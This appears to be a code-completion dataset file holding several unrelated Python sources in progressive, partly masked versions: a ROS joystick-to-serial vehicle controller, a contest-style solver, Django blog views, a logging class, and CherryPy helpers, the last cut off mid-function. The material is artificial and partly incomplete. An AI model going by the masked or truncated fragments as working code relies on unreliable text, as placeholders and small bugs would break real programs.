ser.write('2000a'.encode('utf-8'))\n print('Joystick button 5 pressed.')\n first_d = 1\n if button - button_ != 0:\n if button4 == 0:\n first_a = 0\n if button5 == 0:\n first_d = 0\n ser.write('3000a'.encode('utf-8'))\n print('Joystick button released.')\n button = button_\n\n\ndef start():\n rospy.Subscriber('joy', Joy, callback)\n 
rospy.init_node('Joy2Turtle')\n rospy.spin()\n\n\nif __name__ == '__main__':\n start()\n",
"step-4": "import rospy\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import Joy\nimport serial\nfrom sys import platform\nif platform == 'linux' or platform == 'linux2':\n ser = serial.Serial('/dev/ttyACM0')\nelif platform == 'darwin':\n pass\nelif platform == 'win32':\n ser = serial.Serial('COM16')\n<mask token>\noldvar = 0\nfirst_a = 0\nfirst_d = 0\nbase_throttle = 5500\npeak_throttle = 6500\nbase_brake = 450\npeak_brake = 600\nbutton = 0\n\n\ndef callback(data):\n global first_a\n global first_d\n global oldvar\n global base_throttle\n global peak_throttle\n global base_brake\n global peak_brake\n global button\n axis1 = -data.axes[1]\n axis3 = -data.axes[3]\n button1 = data.buttons[1]\n button4 = data.buttons[4]\n button5 = data.buttons[5]\n button_ = button1 + button4 + button5\n if axis1 > 0.1:\n bval = int(axis1 * (peak_brake - base_brake) + base_brake)\n print(bval)\n ser.write(str(bval).encode('utf-8'))\n ser.write('a'.encode('utf-8'))\n print('Brake')\n elif axis1 < -0.1 and axis3 < 0.1:\n tval = int((axis1 * -1 + axis3 * -1) * (peak_throttle -\n base_throttle) * 0.5 + base_throttle)\n if abs(tval - oldvar) > 5:\n ser.write(str(tval).encode('utf-8'))\n ser.write('a'.encode('utf-8'))\n ser.write('450a'.encode('utf-8'))\n print('Throttle')\n oldvar = tval\n elif axis1 > -0.1 and axis1 < 0.1:\n ser.write('4000a'.encode('utf-8'))\n ser.write('450a'.encode('utf-8'))\n print('Zero Throttle')\n print(axis1)\n print(axis3)\n if button1 == 1:\n print('Emergency Brake')\n ser.write('4600a'.encode('utf-8'))\n ser.write('600a'.encode('utf-8'))\n if button4 and button5 == 0:\n if first_a == 0:\n ser.write('1000a'.encode('utf-8'))\n print('Joystick button 4 pressed.')\n first_a = 1\n if button5 and button4 == 0:\n if first_d == 0:\n ser.write('2000a'.encode('utf-8'))\n print('Joystick button 5 pressed.')\n first_d = 1\n if button - button_ != 0:\n if button4 == 0:\n first_a = 0\n if button5 == 0:\n first_d = 0\n ser.write('3000a'.encode('utf-8'))\n 
print('Joystick button released.')\n button = button_\n\n\ndef start():\n rospy.Subscriber('joy', Joy, callback)\n rospy.init_node('Joy2Turtle')\n rospy.spin()\n\n\nif __name__ == '__main__':\n start()\n",
"step-5": "#!/usr/bin/env python\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import Joy\n\nimport serial\nfrom sys import platform\nif platform == \"linux\" or platform == \"linux2\":\n ser = serial.Serial('/dev/ttyACM0')\nelif platform == \"darwin\":\n pass\nelif platform == \"win32\":\n # Windows...\n ser = serial.Serial('COM16')\n\"\"\"\nIn this test code we are testing basic vehicle control over the network\nwe use ROS middleware to send the control commands \nThis script runs at the remote driver end. \nReceives joystick messages (subscribed to Joy topic)\nthen converts the joystick inputs into commands\n\nWE ARE NOT USING THIS METHOD NOW \n--- WE HAVE SEPERATED OUT ALL THE STREAMS FROM THE JOYSTICK\n\n\"\"\"\n\noldvar = 0\nfirst_a = 0\nfirst_d = 0\n# Configuatrion tuned for CAR in LOW speed\nbase_throttle = 5500\npeak_throttle = 6500\nbase_brake = 450\npeak_brake = 600\nbutton = 0\n\n\ndef callback(data):\n global first_a\n global first_d\n global oldvar\n global base_throttle\n global peak_throttle\n global base_brake\n global peak_brake\n global button\n # print data\n axis1 = -data.axes[1]\n axis3 = -data.axes[3] # in logitech axis 3 is axis 4 confirm with ashish\n button1 = data.buttons[1]\n button4 = data.buttons[4]\n button5 = data.buttons[5]\n\n button_ = button1+button4+button5\n\n if axis1 > 0.1:\n bval = int((axis1) * (peak_brake - base_brake) + base_brake)\n print(bval)\n ser.write(str(bval).encode('utf-8'))\n ser.write(\"a\".encode('utf-8'))\n #### ser.write(\"4000a\".encode('utf-8')) #throttle released on braking\n print(\"Brake\")\n elif (axis1 < -0.1 and axis3 < 0.1):\n tval = int((axis1 * -1 + axis3 * -1) * (peak_throttle - base_throttle) * 0.5 + base_throttle)\n if (abs(tval - oldvar) > 5):\n #print(tval)\n ser.write(str(tval).encode('utf-8'))\n ser.write(\"a\".encode('utf-8'))\n ser.write(\"450a\".encode('utf-8')) # brake released on acceleration\n print(\"Throttle\")\n oldvar = tval\n elif (axis1 > -0.1 and 
axis1 < 0.1):\n ser.write(\"4000a\".encode('utf-8'))\n ser.write(\"450a\".encode('utf-8')) # brake released\n print(\"Zero Throttle\")\n print (axis1)\n print (axis3)\n\n if button1 == 1:\n print(\"Emergency Brake\")\n ser.write(\"4600a\".encode('utf-8')) # throttle released\n ser.write(\"600a\".encode('utf-8')) # brake engaged\n\n if (button4 and button5 == 0):\n if (first_a == 0):\n ser.write(\"1000a\".encode('utf-8'))\n print(\"Joystick button 4 pressed.\")\n first_a = 1\n if (button5 and button4 == 0):\n if (first_d == 0):\n ser.write(\"2000a\".encode('utf-8'))\n print(\"Joystick button 5 pressed.\")\n first_d = 1\n\n if(button-button_!= 0):\n if(button4 == 0):\n first_a = 0\n if(button5 == 0):\n first_d = 0\n ser.write(\"3000a\".encode('utf-8'))\n print(\"Joystick button released.\")\n button = button_\n\n# Intializes everything\ndef start():\n rospy.Subscriber(\"joy\", Joy, callback)\n # starts the node\n rospy.init_node('Joy2Turtle')\n rospy.spin()\n\n\nif __name__ == '__main__':\n start()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# coding=utf-8
"""
author = jamon
"""
|
normal
|
{
"blob_id": "00790b9d2648d19a37d1d1864e7fdeab0f59f764",
"index": 4266,
"step-1": "<mask token>\n",
"step-2": "# coding=utf-8\n\"\"\"\nauthor = jamon\n\"\"\"",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
import os
import math
from collections import defaultdict
__author__ = 'steven'
# Problem tag; input files are named '<question><suffix>'.
question='qb'
# Input-file suffixes to try (a file is skipped when it does not exist).
fs={'t1','small.in','large'}
def getmincost(n, c, f, x):
    """Expected total time when making n purchases, also allowing n-1.

    Sums the expected wait for each of the n purchases, adds the final
    wait for x at the resulting rate, and returns the cheaper of that
    plan and the same plan with the last purchase skipped.
    """
    wait = sum(1 / (2 + f * i) for i in range(0, n)) * c
    wait += x / (2 + f * n)
    return min(wait, getmincostnshift(n, c, f, x))
def getmincostnshift(n, c, f, x):
    """Expected total time when the last of n purchases is skipped.

    Equivalent to the n-purchase plan evaluated with n-1 purchases:
    sum of per-purchase waits times c, plus the final wait for x.
    """
    last = n - 1
    rate_sum = sum(1 / (2 + f * i) for i in range(0, last))
    return rate_sum * c + x / (2 + f * last)
def getminn(c, f, x):
    """Smallest n at which buying the n-th boost no longer pays off."""
    gain = x * f - 2 * c
    return int(math.ceil(gain / (c * f)))
def solver(c, f, x):
    """Minimum expected time to reach x, choosing how many boosts to buy.

    NOTE(review): the structure (cost c, rate bonus f, target x) looks like
    Google Code Jam's "Cookie Clicker Alpha" -- confirm against the problem.
    """
    # If even the first purchase cannot pay for itself, never buy.
    if x * f - 2 * c < 0:
        return x / 2
    best_n = getminn(c, f, x)
    return getmincost(best_n, c, f, x)
# Driver: run the solver over every input file listed in fs and write a
# matching '<name>-a' answer file in Code Jam output format.
for s in fs:
    print question+s
    f='./'+question+s
    if os.path.isfile('./'+question+s):
        ls=open(f)
        noq=(int)(ls.readline())  # first line of the file: number of cases
        fout=open(question+s+'-a','w')
        print noq
        for i in range(0,noq):
            fa=ls.readline()
            fa=fa.split();
            # NOTE(review): this comprehension rebinds the outer names f and s
            # (Python 2 leaks comprehension variables); both are reassigned at
            # the top of each loop iteration so it works, but it is fragile.
            c, f, x=[float(s) for s in fa]
            fout.write('Case #%d: %f\n'%(i+1,solver(c,f,x)))
#Case #1: 7
#Case #2: Bad magician!
#Case #3: Volunteer cheated!
|
normal
|
{
"blob_id": "8fee548466abf6d35ea180f8de4e52a9b8902d3f",
"index": 1025,
"step-1": "import os\nimport math\nfrom collections import defaultdict\n__author__ = 'steven'\n\nquestion='qb'\nfs={'t1','small.in','large'}\ndef getmincost(n,c,f,x):\n t=0.0\n\n for i in range(0,n):\n t+=1/(2+f*i)\n t=t*c\n t+=x/(2+f*n)\n ct=getmincostnshift(n,c,f,x)\n return min(t,ct);\n\ndef getmincostnshift(n,c,f,x):\n t=0.0\n n-=1;\n\n for i in range(0,n):\n t+=1/(2+f*i)\n t=t*c\n t+=x/(2+f*n)\n return t\ndef getminn(c,f,x):\n return int(math.ceil((x*f-2*c)/(c*f)))\ndef solver(c,f,x):\n if (x*f-2*c)<0:\n return x/2\n minn=getminn(c,f,x)\n return getmincost(minn,c,f,x)\n\n\nfor s in fs:\n print question+s\n f='./'+question+s\n if os.path.isfile('./'+question+s):\n ls=open(f)\n noq=(int)(ls.readline())\n fout=open(question+s+'-a','w')\n print noq\n for i in range(0,noq):\n fa=ls.readline()\n fa=fa.split();\n c, f, x=[float(s) for s in fa]\n fout.write('Case #%d: %f\\n'%(i+1,solver(c,f,x)))\n\n#Case #1: 7\n#Case #2: Bad magician!\n#Case #3: Volunteer cheated!\n\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
from .models import Post
from django.shortcuts import redirect
from django.core.exceptions import ObjectDoesNotExist
def index(request):
    """Home page: the ten most recent published posts (status=1)."""
    recent = Post.objects.filter(status=1).order_by('-created_on')[:10]
    return render(request, 'blogapp/index.html', {'Post': recent})
def blogs(request):
    """Render the static blog overview template."""
    return render(request, template_name='blogapp/blog.html')
def detail(request, slug):
    """Render a single post looked up by slug.

    When no post matches, the same template is rendered without a
    context (the template is expected to cope with a missing post).
    """
    try:
        context = {'post': Post.objects.get(slug=slug)}
    except ObjectDoesNotExist:
        return render(request, template_name='blogapp/detail.html')
    return render(request, 'blogapp/detail.html', context)
def about(request):
    """Render the static "about" page."""
    return render(request, template_name='blogapp/about.html')
def loginPage(request):
    """Authenticate a user from posted credentials.

    On success the session is logged in and the browser is redirected to
    the index page; on failure an error message is flashed and the login
    form is re-rendered.  GET requests simply show the form.
    """
    if request.method == 'POST':
        username = request.POST.get('username')
        # NOTE(review): the form field is named 'password1' -- confirm the
        # login template posts that name rather than plain 'password'.
        password = request.POST.get('password1')
        user = authenticate(username=username, password=password)
        if user is not None:
            login(request, user)
            return redirect('index')
        messages.error(request, 'Username or Password Incorrect')
    # GET request, or failed authentication: show the login form.
    return render(request, 'accounts/login.html')
def logoutUser(request):
    """End the current session and redirect to the login page."""
    logout(request)
    return redirect('login')
def contact(request):
    """Render the static contact page."""
    return render(request, template_name='blogapp/contact.html')
def products(request):
    """Render the products page.

    NOTE(review): the template lives under 'mainapp/' while every other
    view here uses 'blogapp/' -- confirm the path is intentional.
    """
    return render(request, template_name='mainapp/products.html')
|
normal
|
{
"blob_id": "aec374ffa368755350d0d75c96860f760e8524e1",
"index": 7301,
"step-1": "<mask token>\n\n\ndef index(request):\n blogs = Post.objects.filter(status=1).order_by('-created_on')[:10]\n context = {'Post': blogs}\n return render(request, 'blogapp/index.html', context)\n\n\ndef blogs(request):\n return render(request, template_name='blogapp/blog.html')\n\n\ndef detail(request, slug):\n try:\n post = Post.objects.get(slug=slug)\n context = {'post': post}\n return render(request, 'blogapp/detail.html', context)\n except ObjectDoesNotExist:\n return render(request, template_name='blogapp/detail.html')\n\n\ndef about(request):\n return render(request, template_name='blogapp/about.html')\n\n\ndef loginPage(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password1')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('index')\n else:\n messages.error(request, 'Username or Password Incorrect')\n return render(request, 'accounts/login.html')\n else:\n return render(request, 'accounts/login.html')\n\n\ndef logoutUser(request):\n logout(request)\n return redirect('login')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef index(request):\n blogs = Post.objects.filter(status=1).order_by('-created_on')[:10]\n context = {'Post': blogs}\n return render(request, 'blogapp/index.html', context)\n\n\ndef blogs(request):\n return render(request, template_name='blogapp/blog.html')\n\n\ndef detail(request, slug):\n try:\n post = Post.objects.get(slug=slug)\n context = {'post': post}\n return render(request, 'blogapp/detail.html', context)\n except ObjectDoesNotExist:\n return render(request, template_name='blogapp/detail.html')\n\n\ndef about(request):\n return render(request, template_name='blogapp/about.html')\n\n\ndef loginPage(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password1')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('index')\n else:\n messages.error(request, 'Username or Password Incorrect')\n return render(request, 'accounts/login.html')\n else:\n return render(request, 'accounts/login.html')\n\n\ndef logoutUser(request):\n logout(request)\n return redirect('login')\n\n\n<mask token>\n\n\ndef products(request):\n return render(request, template_name='mainapp/products.html')\n",
"step-3": "<mask token>\n\n\ndef index(request):\n blogs = Post.objects.filter(status=1).order_by('-created_on')[:10]\n context = {'Post': blogs}\n return render(request, 'blogapp/index.html', context)\n\n\ndef blogs(request):\n return render(request, template_name='blogapp/blog.html')\n\n\ndef detail(request, slug):\n try:\n post = Post.objects.get(slug=slug)\n context = {'post': post}\n return render(request, 'blogapp/detail.html', context)\n except ObjectDoesNotExist:\n return render(request, template_name='blogapp/detail.html')\n\n\ndef about(request):\n return render(request, template_name='blogapp/about.html')\n\n\ndef loginPage(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password1')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('index')\n else:\n messages.error(request, 'Username or Password Incorrect')\n return render(request, 'accounts/login.html')\n else:\n return render(request, 'accounts/login.html')\n\n\ndef logoutUser(request):\n logout(request)\n return redirect('login')\n\n\ndef contact(request):\n return render(request, template_name='blogapp/contact.html')\n\n\ndef products(request):\n return render(request, template_name='mainapp/products.html')\n",
"step-4": "from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom .models import Post\nfrom django.shortcuts import redirect\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\ndef index(request):\n blogs = Post.objects.filter(status=1).order_by('-created_on')[:10]\n context = {'Post': blogs}\n return render(request, 'blogapp/index.html', context)\n\n\ndef blogs(request):\n return render(request, template_name='blogapp/blog.html')\n\n\ndef detail(request, slug):\n try:\n post = Post.objects.get(slug=slug)\n context = {'post': post}\n return render(request, 'blogapp/detail.html', context)\n except ObjectDoesNotExist:\n return render(request, template_name='blogapp/detail.html')\n\n\ndef about(request):\n return render(request, template_name='blogapp/about.html')\n\n\ndef loginPage(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password1')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('index')\n else:\n messages.error(request, 'Username or Password Incorrect')\n return render(request, 'accounts/login.html')\n else:\n return render(request, 'accounts/login.html')\n\n\ndef logoutUser(request):\n logout(request)\n return redirect('login')\n\n\ndef contact(request):\n return render(request, template_name='blogapp/contact.html')\n\n\ndef products(request):\n return render(request, template_name='mainapp/products.html')\n",
"step-5": "from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom .models import Post\nfrom django.shortcuts import redirect\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\ndef index(request):\n blogs = Post.objects.filter(status=1).order_by('-created_on')[:10]\n context = {'Post': blogs}\n return render(request, 'blogapp/index.html', context)\n\ndef blogs(request):\n return render(request, template_name='blogapp/blog.html')\n\n\ndef detail(request, slug):\n try:\n post = Post.objects.get(slug=slug)\n context = {'post': post}\n return render(request, 'blogapp/detail.html', context)\n except ObjectDoesNotExist:\n return render(request, template_name='blogapp/detail.html')\n\n\ndef about(request):\n return render(request, template_name='blogapp/about.html')\n\ndef loginPage(request):\n\n # form = CreateUserForm()\n # context = {'form': form}\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password1')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('index')\n else:\n messages.error(request, 'Username or Password Incorrect')\n return render(request, 'accounts/login.html',)\n else:\n return render(request, 'accounts/login.html',)\n\n\ndef logoutUser(request):\n\n logout(request)\n return redirect('login')\n\n\n\ndef contact(request):\n return render(request, template_name='blogapp/contact.html')\n\n\ndef products(request):\n return render(request, template_name='mainapp/products.html')",
"step-ids": [
6,
7,
8,
9,
10
]
}
|
[
6,
7,
8,
9,
10
] |
# -*- coding: utf-8 -*-
from .log_config import LogBase
import os
__all__ = ['MyLog']
class MyLog(LogBase):
    """Level-separated logger with automatic gzip compression.

    Records are split per level into files such as
    ``2019-11-11.info.log.gz`` under *log_path*.

    Args:
        log_path: Directory the log files are written to; created if
            missing.  Defaults to ``./logs/``.
        **kwargs: Forwarded to :class:`LogBase`.  Keys documented there
            include ``logger_name``, the per-level file names
            (``info_name``/``error_name``/``warning_name``/``debug_name``),
            ``interval`` (compression period, default 7 days), ``detail``
            (verbose record format) and the booleans
            ``debug``/``info``/``error``/``warning`` selecting which levels
            are recorded (``debug`` defaults to off, the others to on).

    Note:
        Only one ``MyLog`` instance effectively exists at a time: the
        attributes of the first instance created win, and later instances
        share its configuration.
        # NOTE(review): that singleton behaviour comes from LogBase --
        # confirm there.

    Example:
        >>> logger = MyLog(debug=True).get_logger()
        >>> logger.info('info')
        >>> logger.error('error')
    """

    def __init__(self, log_path: str = './logs/', **kwargs):
        self.type_need(log_path, str)
        if not log_path.endswith('/'):
            log_path += '/'
        # exist_ok avoids the check-then-create race of the previous
        # os.path.exists() + os.makedirs() sequence.
        os.makedirs(log_path, exist_ok=True)
        super().__init__(dir_path=log_path, **kwargs)

    def get_logger(self):
        """Return the configured logger instance."""
        return self._get_logger()

    @staticmethod
    def type_need(parm, type_):
        """Raise TypeError unless *parm* is an instance of *type_*."""
        if not isinstance(parm, type_):
            raise TypeError(f'expect {type_},but got {type(parm)}')
|
normal
|
{
"blob_id": "3a9987ac326131878b80cb819e3d06ce2f4cb054",
"index": 8461,
"step-1": "<mask token>\n\n\nclass MyLog(LogBase):\n <mask token>\n <mask token>\n\n def get_logger(self):\n return self._get_logger()\n\n @staticmethod\n def type_need(parm, type_):\n if not isinstance(parm, type_):\n raise TypeError(f'expect {type_},but got {type(parm)}')\n",
"step-2": "<mask token>\n\n\nclass MyLog(LogBase):\n \"\"\"\n 功能:\n 将日志分日志等级记录,并自动压缩2019-11-11.info.log.gz\n\n 参数:\n :param dir_path: 日志记录的路径,默认是当前路径下的log文件夹\n :param logger_name: logger对象的名字\n :param info_name: 保存info等级的文件名字\n :param error_name:\n :param warning_name:\n :param debug_name:\n :param interval: 压缩日志的频率,默认是7天\n :param detail: bool值,记录日志是否为详细记录\n :param debug: 是否记录debug,默认不记录\n :param info: 是否记录info,默认记录\n :param error:\n :param warning:\n 实例方法:\n get_logger()-->logger\n\n 使用举例:\n # 记录四种类型的日志\n logger = MyLog(debug=True).get_logger()\n logger.info('info')\n logger.debug('debug')\n logger.error('error')\n logger.warning('warning')\n\n # # # # # # # # # # # # # # # # # # # # # # # # #\n\n # 只记录错误日志\n logger = MyLog(info=False,warning=False).get_logger()\n logger.info('info')\n logger.debug('debug')\n logger.error('error')\n logger.warning('warning')\n 注意:\n MyLog()的实例只会同时存在一个,默认记录首次创建实例的属性.\n 例如:\n\n mylog = MyLog('./logs/logs/')\n mylog2 = MyLog()\n logger = mylog.get_logger()\n logger2 = mylog2.get_logger()\n logger.info('info')\n\n logger2 = MyLog('./logs/logs2/').get_logger()\n logger2.info('info2')\n\n 以上两个logger logger2,会以logger(第一次创建实例)的属性为准,日志会存放在./logs/logs/下\n\n\n\n \"\"\"\n\n def __init__(self, log_path: str='./logs/', **kwargs):\n self.type_need(log_path, str)\n if not log_path.endswith('/'):\n log_path += '/'\n if not os.path.exists(log_path):\n os.makedirs(log_path)\n super(MyLog, self).__init__(dir_path=log_path, **kwargs)\n\n def get_logger(self):\n return self._get_logger()\n\n @staticmethod\n def type_need(parm, type_):\n if not isinstance(parm, type_):\n raise TypeError(f'expect {type_},but got {type(parm)}')\n",
"step-3": "<mask token>\n__all__ = ['MyLog']\n\n\nclass MyLog(LogBase):\n \"\"\"\n 功能:\n 将日志分日志等级记录,并自动压缩2019-11-11.info.log.gz\n\n 参数:\n :param dir_path: 日志记录的路径,默认是当前路径下的log文件夹\n :param logger_name: logger对象的名字\n :param info_name: 保存info等级的文件名字\n :param error_name:\n :param warning_name:\n :param debug_name:\n :param interval: 压缩日志的频率,默认是7天\n :param detail: bool值,记录日志是否为详细记录\n :param debug: 是否记录debug,默认不记录\n :param info: 是否记录info,默认记录\n :param error:\n :param warning:\n 实例方法:\n get_logger()-->logger\n\n 使用举例:\n # 记录四种类型的日志\n logger = MyLog(debug=True).get_logger()\n logger.info('info')\n logger.debug('debug')\n logger.error('error')\n logger.warning('warning')\n\n # # # # # # # # # # # # # # # # # # # # # # # # #\n\n # 只记录错误日志\n logger = MyLog(info=False,warning=False).get_logger()\n logger.info('info')\n logger.debug('debug')\n logger.error('error')\n logger.warning('warning')\n 注意:\n MyLog()的实例只会同时存在一个,默认记录首次创建实例的属性.\n 例如:\n\n mylog = MyLog('./logs/logs/')\n mylog2 = MyLog()\n logger = mylog.get_logger()\n logger2 = mylog2.get_logger()\n logger.info('info')\n\n logger2 = MyLog('./logs/logs2/').get_logger()\n logger2.info('info2')\n\n 以上两个logger logger2,会以logger(第一次创建实例)的属性为准,日志会存放在./logs/logs/下\n\n\n\n \"\"\"\n\n def __init__(self, log_path: str='./logs/', **kwargs):\n self.type_need(log_path, str)\n if not log_path.endswith('/'):\n log_path += '/'\n if not os.path.exists(log_path):\n os.makedirs(log_path)\n super(MyLog, self).__init__(dir_path=log_path, **kwargs)\n\n def get_logger(self):\n return self._get_logger()\n\n @staticmethod\n def type_need(parm, type_):\n if not isinstance(parm, type_):\n raise TypeError(f'expect {type_},but got {type(parm)}')\n",
"step-4": "from .log_config import LogBase\nimport os\n__all__ = ['MyLog']\n\n\nclass MyLog(LogBase):\n \"\"\"\n 功能:\n 将日志分日志等级记录,并自动压缩2019-11-11.info.log.gz\n\n 参数:\n :param dir_path: 日志记录的路径,默认是当前路径下的log文件夹\n :param logger_name: logger对象的名字\n :param info_name: 保存info等级的文件名字\n :param error_name:\n :param warning_name:\n :param debug_name:\n :param interval: 压缩日志的频率,默认是7天\n :param detail: bool值,记录日志是否为详细记录\n :param debug: 是否记录debug,默认不记录\n :param info: 是否记录info,默认记录\n :param error:\n :param warning:\n 实例方法:\n get_logger()-->logger\n\n 使用举例:\n # 记录四种类型的日志\n logger = MyLog(debug=True).get_logger()\n logger.info('info')\n logger.debug('debug')\n logger.error('error')\n logger.warning('warning')\n\n # # # # # # # # # # # # # # # # # # # # # # # # #\n\n # 只记录错误日志\n logger = MyLog(info=False,warning=False).get_logger()\n logger.info('info')\n logger.debug('debug')\n logger.error('error')\n logger.warning('warning')\n 注意:\n MyLog()的实例只会同时存在一个,默认记录首次创建实例的属性.\n 例如:\n\n mylog = MyLog('./logs/logs/')\n mylog2 = MyLog()\n logger = mylog.get_logger()\n logger2 = mylog2.get_logger()\n logger.info('info')\n\n logger2 = MyLog('./logs/logs2/').get_logger()\n logger2.info('info2')\n\n 以上两个logger logger2,会以logger(第一次创建实例)的属性为准,日志会存放在./logs/logs/下\n\n\n\n \"\"\"\n\n def __init__(self, log_path: str='./logs/', **kwargs):\n self.type_need(log_path, str)\n if not log_path.endswith('/'):\n log_path += '/'\n if not os.path.exists(log_path):\n os.makedirs(log_path)\n super(MyLog, self).__init__(dir_path=log_path, **kwargs)\n\n def get_logger(self):\n return self._get_logger()\n\n @staticmethod\n def type_need(parm, type_):\n if not isinstance(parm, type_):\n raise TypeError(f'expect {type_},but got {type(parm)}')\n",
"step-5": "# -*- coding: utf-8 -*-\r\n\r\nfrom .log_config import LogBase\r\nimport os\r\n\r\n__all__ = ['MyLog']\r\n\r\n\r\nclass MyLog(LogBase):\r\n \"\"\"\r\n 功能:\r\n 将日志分日志等级记录,并自动压缩2019-11-11.info.log.gz\r\n\r\n 参数:\r\n :param dir_path: 日志记录的路径,默认是当前路径下的log文件夹\r\n :param logger_name: logger对象的名字\r\n :param info_name: 保存info等级的文件名字\r\n :param error_name:\r\n :param warning_name:\r\n :param debug_name:\r\n :param interval: 压缩日志的频率,默认是7天\r\n :param detail: bool值,记录日志是否为详细记录\r\n :param debug: 是否记录debug,默认不记录\r\n :param info: 是否记录info,默认记录\r\n :param error:\r\n :param warning:\r\n 实例方法:\r\n get_logger()-->logger\r\n\r\n 使用举例:\r\n # 记录四种类型的日志\r\n logger = MyLog(debug=True).get_logger()\r\n logger.info('info')\r\n logger.debug('debug')\r\n logger.error('error')\r\n logger.warning('warning')\r\n\r\n # # # # # # # # # # # # # # # # # # # # # # # # #\r\n\r\n # 只记录错误日志\r\n logger = MyLog(info=False,warning=False).get_logger()\r\n logger.info('info')\r\n logger.debug('debug')\r\n logger.error('error')\r\n logger.warning('warning')\r\n 注意:\r\n MyLog()的实例只会同时存在一个,默认记录首次创建实例的属性.\r\n 例如:\r\n\r\n mylog = MyLog('./logs/logs/')\r\n mylog2 = MyLog()\r\n logger = mylog.get_logger()\r\n logger2 = mylog2.get_logger()\r\n logger.info('info')\r\n\r\n logger2 = MyLog('./logs/logs2/').get_logger()\r\n logger2.info('info2')\r\n\r\n 以上两个logger logger2,会以logger(第一次创建实例)的属性为准,日志会存放在./logs/logs/下\r\n\r\n\r\n\r\n \"\"\"\r\n\r\n def __init__(self, log_path: str = './logs/', **kwargs):\r\n self.type_need(log_path, str)\r\n if not log_path.endswith('/'):\r\n log_path += '/'\r\n if not os.path.exists(log_path):\r\n os.makedirs(log_path)\r\n super(MyLog, self).__init__(dir_path=log_path, **kwargs)\r\n\r\n def get_logger(self):\r\n return self._get_logger()\r\n\r\n @staticmethod\r\n def type_need(parm, type_):\r\n if not isinstance(parm, type_):\r\n raise TypeError(f'expect {type_},but got {type(parm)}')\r\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
def redirect(url, status=None):
    """Raise a redirect to the specified address.

    Implemented by raising cherrypy.HTTPRedirect, so it aborts the current
    handler.  A ``status`` of None lets CherryPy pick its default redirect
    status code.
    """
    raise cherrypy.HTTPRedirect(url, status)
def require_method(*allowed_methods):
    """Abort with 405 Method Not Allowed unless the request method is listed.

    HEAD is implicitly permitted whenever GET is.  On rejection the
    ``Allow`` response header is filled with the sorted method list
    before the error is raised.
    """
    methods = list(allowed_methods)
    if 'GET' in methods and 'HEAD' not in methods:
        methods.append('HEAD')
    methods.sort()
    if cherrypy.request.method not in methods:
        cherrypy.response.headers['Allow'] = ', '.join(methods)
        raise cherrypy.HTTPError(405)
def gonext():
    """Redirect to the url given by the "next" request parameter, if any."""
    target = cherrypy.request.params.get('next', '')
    if target != '':
        redirect(target)
<|reserved_special_token_0|>
def get_or_404(cls, id):
    """Return the *cls* object with the given id, or abort with 404.

    The id is coerced to unicode before the lookup; a missing object
    surfaces as KeyError from the object store and is translated into
    cherrypy.NotFound.
    """
    try:
        return cls.objects.get(unicode(id))
    except KeyError:
        raise cherrypy.NotFound
def locked(fn):
"""Decorator to ensure that the mutex is locked while calling a method.
The method's object must have a mutex in a property named "mutex".
"""
def locked_method(self, *args, **kwargs):
self.mutex.acquire()
try:
return fn(self, *args, **kwargs)
finally:
self.mutex.release()
return locked_method
def get_user():
from apps.store.models import User
try:
user = User.objects.get(u'_')
except KeyError:
user = User(None)
user.id = u'_'
User.objects.set(user)
return user
def get_settings():
from apps.store.models import Settings
try:
settings = Settings.objects.get(u'_')
except KeyError:
settings = Settings(None)
settings.id = u'_'
settings.set_roots(config.default_media_roots)
Settings.objects.set(settings)
return settings
<|reserved_special_token_0|>
def getparam(name, default=None, stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
The query parameter is always returned as a single item, or None if not
supplied. If supplied multiple times, one of the values is returned.
"""
v = getparamlist(name, stash=stash, params=params)
if len(v) > 0:
return v[0]
return default
<|reserved_special_token_0|>
def getparamlist(name, default=[], stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
Returns a list of values.
"""
if params is None:
params = cherrypy.request.params
v = params.get('new' + name, None)
if v is None:
v = params.get(name, None)
if v is None:
v = params.get('old' + name, None)
if v is None:
return default
v = listify(v)
if stash is not None:
stash[str(name)] = v
return v
def getorderparam(name):
"""Get the sequence of numbers stored in a parameter.
The parameter should contain the numbers separated by commas.
If invalid entries are found, raises an HTTP 400 error.
"""
for num in cherrypy.request.params.get(name, '').split(','):
if num.strip() == '':
continue
try:
yield int(num)
except ValueError:
raise cherrypy.HTTPError(400)
def jsonresp(value):
"""Return a json formatted value, and set appropriate headers.
"""
body = json.dumps(value),
cherrypy.response.headers['Content-Type'] = 'application/json'
return body
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def redirect(url, status=None):
"""Raise a redirect to the specified address.
"""
raise cherrypy.HTTPRedirect(url, status)
def require_method(*allowed_methods):
allowed_methods = list(allowed_methods)
if 'GET' in allowed_methods:
if 'HEAD' not in allowed_methods:
